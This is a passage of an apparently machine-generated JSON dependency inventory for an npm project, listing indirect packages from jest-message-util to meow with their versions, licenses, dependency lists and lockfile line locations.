"ID": "jest-message-util@29.7.0", "Name": "jest-message-util", "Identifier": { "PURL": "pkg:npm/jest-message-util@29.7.0", "UID": "5a2553c2b2e6d806" }, "Version": "29.7.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/code-frame@7.27.1", "@jest/types@29.6.3", "@types/stack-utils@2.0.3", "chalk@4.1.2", "graceful-fs@4.2.11", "micromatch@4.0.8", "pretty-format@29.7.0", "slash@3.0.0", "stack-utils@2.0.6" ], "Locations": [ { "StartLine": 11287, "EndLine": 11306 } ], "AnalyzedBy": "npm" }, { "ID": "jest-mock@29.7.0", "Name": "jest-mock", "Identifier": { "PURL": "pkg:npm/jest-mock@29.7.0", "UID": "8eef8bba47d2744e" }, "Version": "29.7.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@jest/types@29.6.3", "@types/node@24.7.0", "jest-util@29.7.0" ], "Locations": [ { "StartLine": 11307, "EndLine": 11320 } ], "AnalyzedBy": "npm" }, { "ID": "jest-regex-util@29.6.3", "Name": "jest-regex-util", "Identifier": { "PURL": "pkg:npm/jest-regex-util@29.6.3", "UID": "13f9d0c61a530470" }, "Version": "29.6.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 11339, "EndLine": 11347 } ], "AnalyzedBy": "npm" }, { "ID": "jest-util@29.7.0", "Name": "jest-util", "Identifier": { "PURL": "pkg:npm/jest-util@29.7.0", "UID": "323c67ec08569d61" }, "Version": "29.7.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@jest/types@29.6.3", "@types/node@24.7.0", "chalk@4.1.2", "ci-info@3.9.0", "graceful-fs@4.2.11", "picomatch@2.3.1" ], "Locations": [ { "StartLine": 11495, "EndLine": 11511 } ], "AnalyzedBy": "npm" }, { "ID": "jest-validate@29.7.0", "Name": "jest-validate", "Identifier": { "PURL": "pkg:npm/jest-validate@29.7.0", "UID": "1bb3171dd9c3ca23" }, "Version": "29.7.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@jest/types@29.6.3", "camelcase@6.3.0", "chalk@4.1.2", "jest-get-type@29.6.3", "leven@3.1.0", "pretty-format@29.7.0" ], "Locations": [ { "StartLine": 11512, "EndLine": 11528 } ], "AnalyzedBy": "npm" }, { "ID": "jest-worker@29.7.0", "Name": "jest-worker", "Identifier": { "PURL": "pkg:npm/jest-worker@29.7.0", "UID": "e5e921e8bfa51598" }, "Version": "29.7.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@types/node@24.7.0", "jest-util@29.7.0", "merge-stream@2.0.0", "supports-color@8.1.1" ], "Locations": [ { "StartLine": 11561, "EndLine": 11575 } ], "AnalyzedBy": "npm" }, { "ID": "joi@17.13.3", "Name": "joi", "Identifier": { "PURL": "pkg:npm/joi@17.13.3", "UID": "8aba80b82bd30103" }, "Version": "17.13.3", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@hapi/hoek@9.3.0", "@hapi/topo@5.1.0", "@sideway/address@4.1.5", "@sideway/formula@3.0.1", "@sideway/pinpoint@2.0.0" ], "Locations": [ { "StartLine": 11591, "EndLine": 11604 } ], "AnalyzedBy": "npm" }, { "ID": "js-tokens@4.0.0", "Name": "js-tokens", "Identifier": { "PURL": "pkg:npm/js-tokens@4.0.0", "UID": "79d7a5b21eedbda6" }, "Version": "4.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 11605, "EndLine": 11610 } ], "AnalyzedBy": "npm" }, { "ID": "js-yaml@3.14.1", "Name": "js-yaml", "Identifier": { "PURL": "pkg:npm/js-yaml@3.14.1", "UID": "7dfa3f9a3b4da359" }, "Version": "3.14.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "argparse@1.0.10", "esprima@4.0.1" ], "Locations": [ { "StartLine": 3454, "EndLine": 3466 } ], "AnalyzedBy": "npm" }, { "ID": "js-yaml@4.1.0", "Name": "js-yaml", "Identifier": { "PURL": "pkg:npm/js-yaml@4.1.0", "UID": "d8116734d3e150a5" }, "Version": "4.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "argparse@2.0.1" ], "Locations": [ { "StartLine": 11611, "EndLine": 11622 } ], "AnalyzedBy": "npm" }, { "ID": "jsc-safe-url@0.2.4", "Name": "jsc-safe-url", "Identifier": { "PURL": "pkg:npm/jsc-safe-url@0.2.4", "UID": "7cef32bde1b8549e" }, "Version": "0.2.4", "Licenses": [ "0BSD" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 11623, "EndLine": 11628 } ], "AnalyzedBy": "npm" }, { "ID": "jsesc@3.1.0", "Name": "jsesc", "Identifier": { "PURL": "pkg:npm/jsesc@3.1.0", "UID": "1560ad0f5ad4793d" }, "Version": "3.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 11629, "EndLine": 11640 } ], "AnalyzedBy": "npm" }, { "ID": "json-parse-even-better-errors@2.3.1", "Name": "json-parse-even-better-errors", "Identifier": { "PURL": "pkg:npm/json-parse-even-better-errors@2.3.1", "UID": "519da86049b3e078" }, "Version": "2.3.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 11648, "EndLine": 11653 } ], "AnalyzedBy": "npm" }, { "ID": "json-parse-even-better-errors@4.0.0", "Name": "json-parse-even-better-errors", "Identifier": { "PURL": "pkg:npm/json-parse-even-better-errors@4.0.0", "UID": "ccd861e8406b66c8" }, "Version": "4.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 14571, "EndLine": 14578 } ], "AnalyzedBy": "npm" }, { "ID": "json-stringify-nice@1.1.4", "Name": "json-stringify-nice", "Identifier": { "PURL": "pkg:npm/json-stringify-nice@1.1.4", "UID": "5c43d6fca301cb32" }, "Version": "1.1.4", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 14579, "EndLine": 14588 } ], "AnalyzedBy": "npm" }, { "ID": "json5@2.2.3", "Name": "json5", "Identifier": { "PURL": "pkg:npm/json5@2.2.3", "UID": "f245229eea3c095" }, "Version": "2.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 11688, "EndLine": 11699 } ], "AnalyzedBy": "npm" }, { "ID": "jsonfile@4.0.0", "Name": "jsonfile", "Identifier": { "PURL": "pkg:npm/jsonfile@4.0.0", "UID": "78c2a953542e71fd" }, "Version": "4.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "graceful-fs@4.2.11" ], "Locations": [ { "StartLine": 11700, "EndLine": 11708 } ], "AnalyzedBy": "npm" }, { "ID": "jsonfile@6.2.0", "Name": "jsonfile", "Identifier": { "PURL": "pkg:npm/jsonfile@6.2.0", "UID": "a902839ec7cfa7a7" }, "Version": "6.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "graceful-fs@4.2.11", "universalify@2.0.1" ], "Locations": [ { "StartLine": 16428, "EndLine": 16440 }, { "StartLine": 17620, "EndLine": 17631 } ], "AnalyzedBy": "npm" }, { "ID": "jsonparse@1.3.1", "Name": "jsonparse", "Identifier": { "PURL": "pkg:npm/jsonparse@1.3.1", "UID": "f0121e0717d6f941" }, "Version": "1.3.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 14589, "EndLine": 14598 } ], "AnalyzedBy": "npm" }, { "ID": "just-diff@6.0.2", "Name": "just-diff", "Identifier": { "PURL": "pkg:npm/just-diff@6.0.2", "UID": "d943bd72f344e042" }, "Version": "6.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 14599, "EndLine": 14605 } ], "AnalyzedBy": "npm" }, { "ID": "just-diff-apply@5.5.0", "Name": "just-diff-apply", "Identifier": { "PURL": "pkg:npm/just-diff-apply@5.5.0", "UID": "65c64bc428a49047" }, "Version": "5.5.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 14606, "EndLine": 14612 } ], "AnalyzedBy": "npm" }, { "ID": "kind-of@6.0.3", "Name": "kind-of", "Identifier": { "PURL": "pkg:npm/kind-of@6.0.3", "UID": "a4c3816de41f6a69" }, "Version": "6.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 11745, "EndLine": 11753 } ], "AnalyzedBy": "npm" }, { "ID": "kleur@3.0.3", "Name": "kleur", "Identifier": { "PURL": "pkg:npm/kleur@3.0.3", "UID": "ebc36ab264ec0862" }, "Version": "3.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 11764, "EndLine": 11772 } ], "AnalyzedBy": "npm" }, { "ID": "launch-editor@2.11.1", "Name": "launch-editor", "Identifier": { "PURL": "pkg:npm/launch-editor@2.11.1", "UID": "bcebec8dc3411b47" }, "Version": "2.11.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "picocolors@1.1.1", "shell-quote@1.8.3" ], "Locations": [ { "StartLine": 11773, "EndLine": 11782 } ], "AnalyzedBy": "npm" }, { "ID": "leven@3.1.0", "Name": "leven", "Identifier": { "PURL": "pkg:npm/leven@3.1.0", "UID": "9713d88e5c3048e" }, "Version": "3.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 11783, "EndLine": 11791 } ], "AnalyzedBy": "npm" }, { "ID": "libnpmaccess@10.0.3", "Name": "libnpmaccess", "Identifier": { "PURL": "pkg:npm/libnpmaccess@10.0.3", "UID": "ba5c5e151e972817" }, "Version": "10.0.3", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "npm-package-arg@13.0.1", "npm-registry-fetch@19.0.0" ], "Locations": [ { "StartLine": 14613, "EndLine": 14626 } ], "AnalyzedBy": "npm" }, { "ID": "libnpmdiff@8.0.9", "Name": "libnpmdiff", "Identifier": { "PURL": "pkg:npm/libnpmdiff@8.0.9", "UID": "4e69536311eb8399" }, "Version": "8.0.9", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@npmcli/arborist@9.1.6", "@npmcli/installed-package-contents@3.0.0", "binary-extensions@3.1.0", "diff@8.0.2", "minimatch@10.0.3", "npm-package-arg@13.0.1", "pacote@21.0.3", "tar@7.5.1" ], "Locations": [ { "StartLine": 14627, "EndLine": 14644 } ], "AnalyzedBy": "npm" }, { "ID": "libnpmexec@10.1.8", "Name": "libnpmexec", "Identifier": { "PURL": "pkg:npm/libnpmexec@10.1.8", "UID": "7546ae74cc43934f" }, "Version": "10.1.8", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@npmcli/arborist@9.1.6", "@npmcli/package-json@7.0.1", "@npmcli/run-script@10.0.0", "ci-info@4.3.1", "npm-package-arg@13.0.1", "pacote@21.0.3", "proc-log@5.0.0", "promise-retry@2.0.1", "read@4.1.0", "semver@7.7.3", "signal-exit@4.1.0", "walk-up-path@4.0.0" ], "Locations": [ { "StartLine": 14645, "EndLine": 14666 } ], "AnalyzedBy": "npm" }, { "ID": "libnpmfund@7.0.9", "Name": "libnpmfund", "Identifier": { "PURL": "pkg:npm/libnpmfund@7.0.9", "UID": "3f0f67d32ab0af46" }, "Version": "7.0.9", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@npmcli/arborist@9.1.6" ], "Locations": [ { "StartLine": 14667, "EndLine": 14677 } ], "AnalyzedBy": "npm" }, { "ID": "libnpmorg@8.0.1", "Name": "libnpmorg", "Identifier": { "PURL": "pkg:npm/libnpmorg@8.0.1", "UID": "8dff2e7c84143e00" }, "Version": "8.0.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "aproba@2.1.0", "npm-registry-fetch@19.0.0" ], "Locations": [ { "StartLine": 14678, "EndLine": 14691 } ], "AnalyzedBy": "npm" }, { "ID": "libnpmpack@9.0.9", "Name": "libnpmpack", "Identifier": { "PURL": "pkg:npm/libnpmpack@9.0.9", "UID": "74824c3e29531652" }, "Version": "9.0.9", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@npmcli/arborist@9.1.6", "@npmcli/run-script@10.0.0", "npm-package-arg@13.0.1", "pacote@21.0.3" ], "Locations": [ { "StartLine": 14692, "EndLine": 14705 } ], "AnalyzedBy": "npm" }, { "ID": "libnpmpublish@11.1.2", "Name": "libnpmpublish", "Identifier": { "PURL": "pkg:npm/libnpmpublish@11.1.2", "UID": "4e2a2b4a837201c3" }, "Version": "11.1.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@npmcli/package-json@7.0.1", "ci-info@4.3.1", "npm-package-arg@13.0.1", "npm-registry-fetch@19.0.0", "proc-log@5.0.0", "semver@7.7.3", "sigstore@4.0.0", "ssri@12.0.0" ], "Locations": [ { "StartLine": 14706, "EndLine": 14723 } ], "AnalyzedBy": "npm" }, { "ID": "libnpmsearch@9.0.1", "Name": "libnpmsearch", "Identifier": { "PURL": "pkg:npm/libnpmsearch@9.0.1", "UID": "a431f251222d2888" }, "Version": "9.0.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "npm-registry-fetch@19.0.0" ], "Locations": [ { "StartLine": 14724, "EndLine": 14736 } ], "AnalyzedBy": "npm" }, { "ID": "libnpmteam@8.0.2", "Name": "libnpmteam", "Identifier": { "PURL": "pkg:npm/libnpmteam@8.0.2", "UID": "eb662154a7a530db" }, "Version": "8.0.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "aproba@2.1.0", "npm-registry-fetch@19.0.0" ], "Locations": [ { "StartLine": 14737, "EndLine": 14750 } ], "AnalyzedBy": "npm" }, { "ID": "libnpmversion@8.0.2", "Name": "libnpmversion", "Identifier": { "PURL": "pkg:npm/libnpmversion@8.0.2", "UID": "a44ebd969b8d37b" }, "Version": "8.0.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@npmcli/git@7.0.0", "@npmcli/run-script@10.0.0", "json-parse-even-better-errors@4.0.0", "proc-log@5.0.0", "semver@7.7.3" ], "Locations": [ { "StartLine": 14751, "EndLine": 14765 } ], "AnalyzedBy": "npm" }, { "ID": "lighthouse-logger@1.4.2", "Name": "lighthouse-logger", "Identifier": { "PURL": "pkg:npm/lighthouse-logger@1.4.2", "UID": "ca144bef29034d7d" }, "Version": "1.4.2", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "debug@2.6.9", "marky@1.3.0" ], "Locations": [ { "StartLine": 11806, "EndLine": 11815 } ], "AnalyzedBy": "npm" }, { "ID": "lines-and-columns@1.2.4", "Name": "lines-and-columns", "Identifier": { "PURL": "pkg:npm/lines-and-columns@1.2.4", "UID": "d69c046e02a86982" }, "Version": "1.2.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 11831, "EndLine": 11836 } ], "AnalyzedBy": "npm" }, { "ID": "linkify-it@2.2.0", "Name": "linkify-it", "Identifier": { "PURL": "pkg:npm/linkify-it@2.2.0", "UID": "e60fc6d846ee32c" }, "Version": "2.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "uc.micro@1.0.6" ], "Locations": [ { "StartLine": 11837, "EndLine": 11845 } ], "AnalyzedBy": "npm" }, { "ID": "locate-path@3.0.0", "Name": "locate-path", "Identifier": { "PURL": "pkg:npm/locate-path@3.0.0", "UID": "b8486ee3af65519" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "p-locate@3.0.0", "path-exists@3.0.0" ], "Locations": [ { "StartLine": 16696, "EndLine": 16708 } ], "AnalyzedBy": "npm" }, { "ID": "locate-path@5.0.0", "Name": "locate-path", "Identifier": { "PURL": "pkg:npm/locate-path@5.0.0", "UID": "8b8b2c5ff93c73f6" }, "Version": "5.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "p-locate@4.1.0" ], "Locations": [ { "StartLine": 3467, "EndLine": 3478 }, { "StartLine": 11961, "EndLine": 11973 }, { "StartLine": 16630, "EndLine": 16642 }, { "StartLine": 18814, "EndLine": 18825 } ], "AnalyzedBy": "npm" }, { "ID": "locate-path@6.0.0", "Name": "locate-path", "Identifier": { "PURL": "pkg:npm/locate-path@6.0.0", "UID": "7424bfd120d6a95" }, "Version": "6.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "p-locate@5.0.0" ], "Locations": [ { "StartLine": 11846, "EndLine": 11860 } ], "AnalyzedBy": "npm" }, { "ID": "lodash@4.17.21", "Name": "lodash", "Identifier": { "PURL": "pkg:npm/lodash@4.17.21", "UID": "3422108e237b34df" }, "Version": "4.17.21", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 11861, "EndLine": 11866 } ], "AnalyzedBy": "npm" }, { "ID": "lodash.camelcase@4.3.0", "Name": "lodash.camelcase", "Identifier": { "PURL": "pkg:npm/lodash.camelcase@4.3.0", "UID": "41d52f6f121a4276" }, "Version": "4.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 11867, "EndLine": 11872 } ], "AnalyzedBy": "npm" }, { "ID": "lodash.debounce@4.0.8", "Name": "lodash.debounce", "Identifier": { "PURL": "pkg:npm/lodash.debounce@4.0.8", "UID": "ae230e3c690e5245" }, "Version": "4.0.8", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 11873, "EndLine": 11878 } ], "AnalyzedBy": "npm" }, { "ID": "lodash.map@4.6.0", "Name": "lodash.map", "Identifier": { "PURL": "pkg:npm/lodash.map@4.6.0", "UID": "7e824149fedc30c1" }, "Version": "4.6.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 11879, "EndLine": 11884 } ], "AnalyzedBy": "npm" }, { "ID": "lodash.throttle@4.1.1", "Name": "lodash.throttle", "Identifier": { "PURL": "pkg:npm/lodash.throttle@4.1.1", "UID": "50f67d03a67e7188" }, "Version": "4.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 11892, "EndLine": 11897 } ], "AnalyzedBy": "npm" }, { "ID": "lodash.zipobject@4.1.3", "Name": "lodash.zipobject", "Identifier": { "PURL": "pkg:npm/lodash.zipobject@4.1.3", "UID": "c2366a6ffcf8bdf1" }, "Version": "4.1.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 11898, "EndLine": 11903 } ], "AnalyzedBy": "npm" }, { "ID": "log-symbols@4.1.0", "Name": "log-symbols", "Identifier": { "PURL": "pkg:npm/log-symbols@4.1.0", "UID": "6c84123cc2f7f549" }, "Version": "4.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "chalk@4.1.2", "is-unicode-supported@0.1.0" ], "Locations": [ { "StartLine": 11904, "EndLine": 11919 } ], "AnalyzedBy": "npm" }, { "ID": "logkitty@0.7.1", "Name": "logkitty", "Identifier": { "PURL": "pkg:npm/logkitty@0.7.1", "UID": "be43a5847c89ca2c" }, "Version": "0.7.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ansi-fragments@0.2.1", "dayjs@1.11.18", "yargs@15.4.1" ], "Locations": [ { "StartLine": 11920, "EndLine": 11934 } ], "AnalyzedBy": "npm" }, { "ID": "long@5.3.2", "Name": "long", "Identifier": { "PURL": "pkg:npm/long@5.3.2", "UID": "497043a73b7e0cce" }, "Version": "5.3.2", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 12062, "EndLine": 12067 } ], "AnalyzedBy": "npm" }, { "ID": "loose-envify@1.4.0", "Name": "loose-envify", "Identifier": { "PURL": "pkg:npm/loose-envify@1.4.0", "UID": "776d2321079d4e72" }, "Version": "1.4.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "js-tokens@4.0.0" ], "Locations": [ { "StartLine": 12068, "EndLine": 12079 } ], "AnalyzedBy": "npm" }, { "ID": "lower-case@2.0.2", "Name": "lower-case", "Identifier": { "PURL": "pkg:npm/lower-case@2.0.2", "UID": "fe61975c5e5a8299" }, "Version": "2.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "tslib@2.8.1" ], "Locations": [ { "StartLine": 12080, "EndLine": 12088 } ], "AnalyzedBy": "npm" }, { "ID": "lru-cache@10.4.3", "Name": "lru-cache", "Identifier": { "PURL": "pkg:npm/lru-cache@10.4.3", "UID": "fd2f9b4bffeabd74" }, "Version": "10.4.3", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 15053, "EndLine": 15059 }, { "StartLine": 16552, "EndLine": 16557 } ], "AnalyzedBy": "npm" }, { "ID": "lru-cache@11.2.2", "Name": "lru-cache", "Identifier": { "PURL": "pkg:npm/lru-cache@11.2.2", "UID": "3621409c86852fcc" }, "Version": "11.2.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 14766, "EndLine": 14773 } ], "AnalyzedBy": "npm" }, { "ID": "lru-cache@5.1.1", "Name": "lru-cache", "Identifier": { "PURL": "pkg:npm/lru-cache@5.1.1", "UID": "4b2141d9aa807fc3" }, "Version": "5.1.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "yallist@3.1.1" ], "Locations": [ { "StartLine": 12095, "EndLine": 12103 } ], "AnalyzedBy": "npm" }, { "ID": "lru-cache@6.0.0", "Name": "lru-cache", "Identifier": { "PURL": "pkg:npm/lru-cache@6.0.0", "UID": "4751333698825ad6" }, "Version": "6.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "yallist@4.0.0" ], "Locations": [ { "StartLine": 6852, "EndLine": 6864 }, { "StartLine": 10024, "EndLine": 10035 }, { "StartLine": 12188, "EndLine": 12200 } ], "AnalyzedBy": "npm" }, { "ID": "make-fetch-happen@14.0.3", "Name": "make-fetch-happen", "Identifier": { "PURL": "pkg:npm/make-fetch-happen@14.0.3", "UID": "1e0e7a3cd68d6531" }, "Version": "14.0.3", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@npmcli/agent@3.0.0", "cacache@19.0.1", "http-cache-semantics@4.2.0", "minipass-fetch@4.0.1", "minipass-flush@1.0.5", "minipass-pipeline@1.2.4", "minipass@7.1.2", "negotiator@1.0.0", "proc-log@5.0.0", "promise-retry@2.0.1", "ssri@12.0.0" ], "Locations": [ { "StartLine": 15060, "EndLine": 15080 } ], "AnalyzedBy": "npm" }, { "ID": "make-fetch-happen@15.0.2", "Name": "make-fetch-happen", "Identifier": { "PURL": "pkg:npm/make-fetch-happen@15.0.2", "UID": "2d316d4ac04ae5c6" }, "Version": "15.0.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@npmcli/agent@4.0.0", "cacache@20.0.1", "http-cache-semantics@4.2.0", "minipass-fetch@4.0.1", "minipass-flush@1.0.5", "minipass-pipeline@1.2.4", "minipass@7.1.2", "negotiator@1.0.0", "proc-log@5.0.0", "promise-retry@2.0.1", "ssri@12.0.0" ], "Locations": [ { "StartLine": 14774, "EndLine": 14794 } ], "AnalyzedBy": "npm" }, { "ID": "make-fetch-happen@9.1.0", "Name": "make-fetch-happen", "Identifier": { "PURL": "pkg:npm/make-fetch-happen@9.1.0", "UID": "86b4cb7bc75f6ae0" }, "Version": "9.1.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "agentkeepalive@4.6.0", "cacache@15.3.0", "http-cache-semantics@4.2.0", "http-proxy-agent@4.0.1", "https-proxy-agent@5.0.1", "is-lambda@1.0.1", "lru-cache@6.0.0", "minipass-collect@1.0.2", "minipass-fetch@1.4.1", "minipass-flush@1.0.5", "minipass-pipeline@1.2.4", "minipass@3.3.6", "negotiator@0.6.4", "promise-retry@2.0.1", "socks-proxy-agent@6.2.1", "ssri@8.0.1" ], "Locations": [ { "StartLine": 12133, "EndLine": 12160 } ], "AnalyzedBy": "npm" }, { "ID": "makeerror@1.0.12", "Name": "makeerror", "Identifier": { "PURL": "pkg:npm/makeerror@1.0.12", "UID": "76341cc096536b9b" }, "Version": "1.0.12", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "tmpl@1.0.5" ], "Locations": [ { "StartLine": 12221, "EndLine": 12229 } ], "AnalyzedBy": "npm" }, { "ID": "map-obj@1.0.1", "Name": "map-obj", "Identifier": { "PURL": "pkg:npm/map-obj@1.0.1", "UID": "521949e923714d60" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7720, "EndLine": 7728 } ], "AnalyzedBy": "npm" }, { "ID": "map-obj@4.3.0", "Name": "map-obj", "Identifier": { "PURL": "pkg:npm/map-obj@4.3.0", "UID": "ae05b49b4ae64b4c" }, "Version": "4.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 12230, "EndLine": 12241 } ], "AnalyzedBy": "npm" }, { "ID": "markdown-it@10.0.0", "Name": "markdown-it", "Identifier": { "PURL": "pkg:npm/markdown-it@10.0.0", "UID": "b068d65a3a75e116" }, "Version": "10.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "argparse@1.0.10", "entities@2.0.3", "linkify-it@2.2.0", "mdurl@1.0.1", "uc.micro@1.0.6" ], "Locations": [ { "StartLine": 12242, "EndLine": 12257 } ], "AnalyzedBy": "npm" }, { "ID": "marky@1.3.0", "Name": "marky", "Identifier": { "PURL": "pkg:npm/marky@1.3.0", "UID": "86b6357b2e9cad6f" }, "Version": "1.3.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 12273, "EndLine": 12278 } ], "AnalyzedBy": "npm" }, { "ID": "math-intrinsics@1.1.0", "Name": "math-intrinsics", "Identifier": { "PURL": "pkg:npm/math-intrinsics@1.1.0", "UID": "9d73ce4a2ae8dd9b" }, "Version": "1.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 12279, "EndLine": 12287 } ], "AnalyzedBy": "npm" }, { "ID": "mdn-data@2.0.14", "Name": "mdn-data", "Identifier": { "PURL": "pkg:npm/mdn-data@2.0.14", "UID": "9248b61ca2bfb038" }, "Version": "2.0.14", "Licenses": [ "CC0-1.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 12288, "EndLine": 12293 } ], "AnalyzedBy": "npm" }, { "ID": "mdn-data@2.0.28", "Name": "mdn-data", "Identifier": { "PURL": "pkg:npm/mdn-data@2.0.28", "UID": "d45209903f7f4c75" }, "Version": "2.0.28", "Licenses": [ "CC0-1.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7604, "EndLine": 7609 } ], "AnalyzedBy": "npm" }, { "ID": "mdn-data@2.0.30", "Name": "mdn-data", "Identifier": { "PURL": "pkg:npm/mdn-data@2.0.30", "UID": "640e61a8b55d94e7" }, "Version": "2.0.30", "Licenses": [ "CC0-1.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 20445, "EndLine": 20450 } ], "AnalyzedBy": "npm" }, { "ID": "mdurl@1.0.1", "Name": "mdurl", "Identifier": { "PURL": "pkg:npm/mdurl@1.0.1", "UID": "57f1aa4167ee4c69" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 12294, "EndLine": 12299 } ], "AnalyzedBy": "npm" }, { "ID": "media-typer@0.3.0", "Name": "media-typer", "Identifier": { "PURL": "pkg:npm/media-typer@0.3.0", "UID": "9df5c51c24edacff" }, "Version": "0.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 12300, "EndLine": 12309 } ], "AnalyzedBy": "npm" }, { "ID": "memoize-one@5.2.1", "Name": "memoize-one", "Identifier": { "PURL": "pkg:npm/memoize-one@5.2.1", "UID": "5d8dc9ee8bc491cb" }, "Version": "5.2.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 12310, "EndLine": 12315 } ], "AnalyzedBy": "npm" }, { "ID": "meow@9.0.0", "Name": "meow", "Identifier": { "PURL": "pkg:npm/meow@9.0.0", "UID": "685004b2009c5472" }, "Version": "9.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@types/minimist@1.2.5", "camelcase-keys@6.2.2", "decamelize-keys@1.1.1", "decamelize@1.2.0", 